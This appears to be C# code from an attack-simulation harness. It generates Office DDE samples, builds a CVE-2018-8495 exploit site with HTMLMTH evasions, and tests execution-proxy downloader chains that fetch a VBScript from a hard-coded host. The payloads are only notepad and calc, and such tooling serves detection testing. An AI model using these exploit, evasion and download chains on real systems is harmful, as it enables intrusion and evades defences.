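/// <summary>
/// Collects the files read by <paramref name="process"/> and, recursively, by every
/// process reachable through its ChildProcesses.
/// </summary>
/// <param name="process">Root of the process tree to walk.</param>
/// <param name="remoteOnly">
/// When true (the default), only files whose FilePath is a Tonsil.Files.RemoteFilePath
/// are returned. When false, every file read anywhere in the tree is returned.
/// </param>
/// <returns>
/// The matching files: the root process's own reads first, then each child's subtree
/// in ChildProcesses order.
/// </returns>
public static IEnumerable<Tonsil.Files.File> GetAllFilesRead(Tonsil.Processes.Process process, bool remoteOnly = true)
{
    var filesRead = new List<Tonsil.Files.File>();

    foreach (var file in process.FilesRead)
    {
        if (!remoteOnly || file.FilePath is Tonsil.Files.RemoteFilePath)
        {
            filesRead.Add(file);
        }
    }

    foreach (var childProcess in process.ChildProcesses)
    {
        // Forward remoteOnly explicitly. Recursing with the parameter's default (true)
        // dropped every local file read by a descendant even when the caller asked for
        // all files, so the result under-reported what the process tree touches.
        // The recursive call has already applied the filter, so no second pass is needed.
        filesRead.AddRange(GetAllFilesRead(childProcess, remoteOnly));
    }

    return filesRead;
}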
/// <summary>
/// Office DDE example: builds an attack named "OfficeDde" whose only output is a
/// SamplesOutput holding one WordDDE and one ExcelDDE sample, then generates it.
/// Both samples are constructed from the same single-entry ProcessList, whose command
/// line is a bare <c>notepad</c> with no arguments.
/// </summary>
/// <returns>The attack, after Generate() has been called on it.</returns>
private static IAttack OfficeDdeExample()
{
    var sampleSink = new SamplesOutput();
    var attack = new Attack(new IOutput[] { sampleSink }, name: "OfficeDde");

    // The one command line both documents are built around.
    var notepadCmdLine = new Tonsil.Processes.CmdLine()
    {
        image = @"notepad",
        arguments = new string[0]
    };
    var commands = new ProcessList(new[] { new Tonsil.Processes.Process(notepadCmdLine) });

    // Each sample is registered under "<fixed stem>.<the sample's own Extension>".
    var wordSample = new WordDDE(commands);
    sampleSink.Add("WordDDE." + wordSample.Extension, wordSample);

    var excelSample = new ExcelDDE(commands);
    sampleSink.Add("ExcelDDE." + excelSample.Extension, excelSample);

    attack.Generate();
    return attack;
}
/// <summary>
/// Returns the OS processes whose name matches the image of
/// <paramref name="targetProcess"/>'s command line.
/// </summary>
/// <param name="targetProcess">Process description whose CmdLine.image supplies the name to look up.</param>
/// <returns>The array produced by System.Diagnostics.Process.GetProcessesByName.</returns>
private static System.Diagnostics.Process[] GetProcesses(Tonsil.Processes.Process targetProcess)
{
    // Reduce the image to its file name, then drop the extension
    // (e.g. "dir\tool.exe" -> "tool.exe" -> "tool") to get the name used for the lookup.
    string imageFileName = new System.IO.FileInfo(targetProcess.CmdLine.image).Name;
    string lookupName = System.IO.Path.GetFileNameWithoutExtension(imageFileName);

    // The lookup is by name only: every process on the machine with this name is
    // returned, whether or not this harness started it.
    return System.Diagnostics.Process.GetProcessesByName(lookupName);
}
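/// <summary>
/// Best-effort kill of every OS process that GetProcesses returns for
/// <paramref name="targetProcess"/>.
/// </summary>
/// <param name="targetProcess">Process description passed through to GetProcesses.</param>
/// <remarks>
/// GetProcesses matches by image name, so this terminates every process with that
/// name, including instances the harness did not start.
/// </remarks>
private static void KillProcesses(Tonsil.Processes.Process targetProcess)
{
    foreach (var proc in GetProcesses(targetProcess))
    {
        try
        {
            proc.Kill();
        }
        catch
        {
            // Deliberately best effort: a process that has already exited or cannot
            // be terminated must not abort the test run.
            Console.WriteLine("Failed to kill process.");
        }
        finally
        {
            // Each System.Diagnostics.Process wraps an OS handle; release it here
            // instead of leaving it to the finalizer on every test iteration.
            proc.Dispose();
        }
    }
}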
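/// <summary>
/// Kills existing instances of the target, launches <paramref name="processUnderTest"/>,
/// waits up to one second for it to exit, then reports whether any process with the
/// target's image name is running. The target instances are killed again before returning.
/// </summary>
/// <param name="processUnderTest">Supplies the image and arguments of the command to launch.</param>
/// <param name="targetProcess">Process whose image name is looked for after the launch.</param>
/// <returns>
/// True when at least one process with the target's name was found after the launch.
/// The check is by name only and does not verify that the process is a descendant of
/// the launched one, so an unrelated instance started in the same window also yields true.
/// </returns>
public static bool TestExecutionProxy(Tonsil.Processes.Process processUnderTest, Tonsil.Processes.Process targetProcess)
{
    // Start from a clean slate so a pre-existing instance cannot produce a false pass.
    KillProcesses(targetProcess);

    var si = new System.Diagnostics.ProcessStartInfo()
    {
        FileName = processUnderTest.CmdLine.image,
        // Arguments are joined with single spaces and no quoting is added here;
        // each element must already be quoted if it contains whitespace.
        Arguments = string.Join(" ", processUnderTest.CmdLine.arguments),
        RedirectStandardOutput = false,
        RedirectStandardError = false,
        RedirectStandardInput = false,
        UseShellExecute = false,
        WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
    };

    // Dispose the launcher's handle once the bounded wait is over. The launched
    // process itself is not terminated here if it is still running.
    using (System.Diagnostics.Process rootProcess = System.Diagnostics.Process.Start(si))
    {
        // Process.Start can return null when no new process resource was started.
        if (rootProcess != null)
        {
            rootProcess.WaitForExit(1000);
        }
    }

    System.Diagnostics.Process[] processes = GetProcesses(targetProcess);
    bool targetSeen = processes.Length > 0;

    // Only the count is needed from this snapshot; release its handles.
    foreach (var snapshotEntry in processes)
    {
        snapshotEntry.Dispose();
    }

    KillProcesses(targetProcess);
    return targetSeen;
}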
/// <summary>
/// Builds and generates the "HtmlmthServerOutput" sample: one HtmlmthServerOutput on a
/// host, holding one HtmlmthWebsite that wraps a CVE_2018_8495 site with a fixed list of
/// HTMLMTH evasions applied to its delivery.
/// </summary>
/// <returns>The attack, after Generate() has been called on it.</returns>
private static IAttack HtmlmthServerOutputExample()
{
    // Note: This sample can't use HostnameB since port 80 on HostnameB is already
    // occupied by the HTTP Server from Sample4
    var dnsName = "HostnameC1";
    // the DNS name "HostnameC1" points to the virtual host "VirtualHostC"
    var virtualHostName = "VirtualHostC";
    // Use the Host that GetHostByHostName returns for this name; create one when it returns null.
    var host = Host.GetHostByHostName(dnsName) ?? new Host(virtualHostName, dnsName, null);

    var serverOutput = new HtmlmthServerOutput(host); // the default port is 80
    var attack = new Attack(new IOutput[] { serverOutput }, name: "HtmlmthServerOutput");

    // This represents a commandline used to create a new process
    var calcCmdLine = new Tonsil.Processes.CmdLine()
    {
        image = @"calc",
        arguments = new string[0]
    };

    // List of commandlines
    // Note: this exploit enforces a ProcessList of size 1
    var commands = new ProcessList(new[] { new Tonsil.Processes.Process(calcCmdLine) });
    var site = new CVE_2018_8495(commands);

    // Network evasions to apply to the delivery of the exploit.
    // Refer to HTMLMTH documentation & source code for the available evasions;
    // the names below are passed through as-is and are not interpreted in this method.
    var evasionNames = new string[]
    {
        "htmlmth.evasions.html.entity_encoding_attributes_dec",
        "htmlmth.evasions.html.external_resource_internal_script",
        "htmlmth.evasions.html.insert_slash_after_opening_tag_names",
        "htmlmth.evasions.html.bom_declared_utf_16be_encoded_as_utf_16_be"
    };

    // HtmlmthWebsite represents the HTTP resource(s) hosted by the HTMLMTH server
    var hostedSite = new HtmlmthWebsite(site, host, evasionNames);

    // Don't forget to bookkeep: the website must be added to the output before Generate()
    serverOutput.Add(hostedSite);

    attack.Generate();

    // The files needed to launch the HTMLMTH server should now be at
    // $(ProjectDir)\bin\$(Configuration)\$(TargetFramework)\Output\Server\HostnameB\80_HTMLMTH_Server
    // NOTE(review): that path names HostnameB, but this sample uses HostnameC1 / VirtualHostC;
    // confirm the actual output directory.
    return attack;
}
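/// <summary>
/// Deletes the destination file, launches <paramref name="processUnderTest"/>, waits,
/// and reports whether the destination file exists afterwards. The destination file is
/// deleted again before returning.
/// </summary>
/// <param name="processUnderTest">Supplies the image and arguments of the command to launch.</param>
/// <param name="sourceFile">Not read by this method; kept for the existing call signature.</param>
/// <param name="destinationFile">File whose FilePath.Path is checked on the local file system.</param>
/// <returns>
/// True when a file exists at the destination path after the wait. Only existence is
/// checked; the file's content is not compared with the source.
/// </returns>
public static bool TestDownloader(Tonsil.Processes.Process processUnderTest, Tonsil.Files.File sourceFile, Tonsil.Files.File destinationFile)
{
    string destinationPath = destinationFile.FilePath.Path;

    // Remove any leftover from a previous run so an old file cannot produce a false pass.
    System.IO.File.Delete(destinationPath);

    var si = new System.Diagnostics.ProcessStartInfo()
    {
        FileName = processUnderTest.CmdLine.image,
        // Arguments are joined with single spaces and no quoting is added here;
        // each element must already be quoted if it contains whitespace.
        Arguments = string.Join(" ", processUnderTest.CmdLine.arguments),
        RedirectStandardOutput = false,
        RedirectStandardError = false,
        RedirectStandardInput = false,
        UseShellExecute = false,
        WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
    };

    // Dispose the launcher's handle when the wait is over. A process that is still
    // running after the wait is not terminated by this method.
    using (System.Diagnostics.Process rootProcess = System.Diagnostics.Process.Start(si))
    {
        // Fixed two-second pause, then up to one more second for the launcher to exit.
        System.Threading.Thread.Sleep(2 * 1000);

        // Process.Start can return null when no new process resource was started.
        if (rootProcess != null)
        {
            rootProcess.WaitForExit(1000);
        }
    }

    bool result = System.IO.File.Exists(destinationPath);

    // Clean up so the next combination starts without the file.
    System.IO.File.Delete(destinationPath);
    return result;
}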
/// <summary>
/// Runs TestDownloader for every combination of ExecutionProxy subclass, Downloader
/// subclass and remote source path (one HTTP, one SMB) that the downloader accepts,
/// printing "Pass"/"Fail" per combination.
/// </summary>
/// <returns>
/// A map from the tested command line (CmdLine.ToString()) to whether the destination
/// file appeared.
/// </returns>
public static Dictionary<string, bool> TestExecutionProxyDownloaders()
{
    var outcomeByCmdLine = new Dictionary<string, bool>();

    // NOTE(review): the server address is hard-coded; presumably a lab host. Confirm before running.
    string serverHost = "10.141.41.1";

    var httpSource = new Tonsil.Files.HttpFilePath()
    {
        Host = serverHost,
        Port = 80,
        Directory = "/somedir/",
        Filename = "somefile.vbs"
    };
    var smbSource = new Tonsil.Files.SmbFilePath()
    {
        Host = serverHost,
        Port = 445,
        ShareName = "someshare",
        Directory = @"\somedir\",
        Filename = "somefile.vbs"
    };
    var localTarget = new Tonsil.Files.LocalFilePath()
    {
        Directory = @"c:\",
        Filename = "somefile.vbs"
    };

    var sourcePaths = new List<Tonsil.Files.FilePath>() { httpSource, smbSource };
    var destinationFile = new Tonsil.Files.File()
    {
        FileType = Tonsil.Files.FileType.VBScript,
        FilePath = localTarget
    };

    // Both subclass sets are discovered by reflection over the assembly that declares
    // Downloader, so an ExecutionProxy subclass living in another assembly is not found.
    Type downloaderBase = typeof(Tonsil.Processes.Downloaders.Downloader);
    Type[] candidateTypes = downloaderBase.Assembly.GetTypes();
    IEnumerable<Type> downloaderTypes = candidateTypes.Where(t => t.IsSubclassOf(downloaderBase));

    Type proxyBase = typeof(Tonsil.Processes.ExecutionProxys.ExecutionProxy);
    IEnumerable<Type> proxyTypes = candidateTypes.Where(t => t.IsSubclassOf(proxyBase));

    foreach (Type proxyType in proxyTypes)
    {
        foreach (Type downloaderType in downloaderTypes)
        {
            foreach (var sourcePath in sourcePaths)
            {
                var sourceFile = new Tonsil.Files.File() { FilePath = sourcePath };

                // Activator.CreateInstance(Type) needs a public parameterless constructor
                // on a concrete type; a fresh downloader is created for every combination.
                var downloader = (Tonsil.Processes.Downloaders.Downloader)Activator.CreateInstance(downloaderType);

                // Skip combinations this downloader does not accept.
                if (!downloader.IsValidSource(sourceFile) || !downloader.IsValidDestination(sourceFile, destinationFile))
                {
                    continue;
                }

                downloader.AddDownload(sourceFile, destinationFile);
                Tonsil.Processes.Process targetProcess = downloader;

                // Wrap the downloader's command line in the execution proxy under test.
                var proxy = (Tonsil.Processes.ExecutionProxys.ExecutionProxy)Activator.CreateInstance(proxyType);
                proxy.AddCmdlineExecution(targetProcess);

                bool passed = TestDownloader(proxy, sourceFile, destinationFile);
                string cmdLineText = proxy.CmdLine.ToString();

                Console.WriteLine("{1}: \t{0}", cmdLineText, passed ? "Pass" : "Fail");

                // Dictionary.Add throws ArgumentException if two combinations produce
                // the same command line text.
                outcomeByCmdLine.Add(cmdLineText, passed);
            }
        }
    }

    return outcomeByCmdLine;
}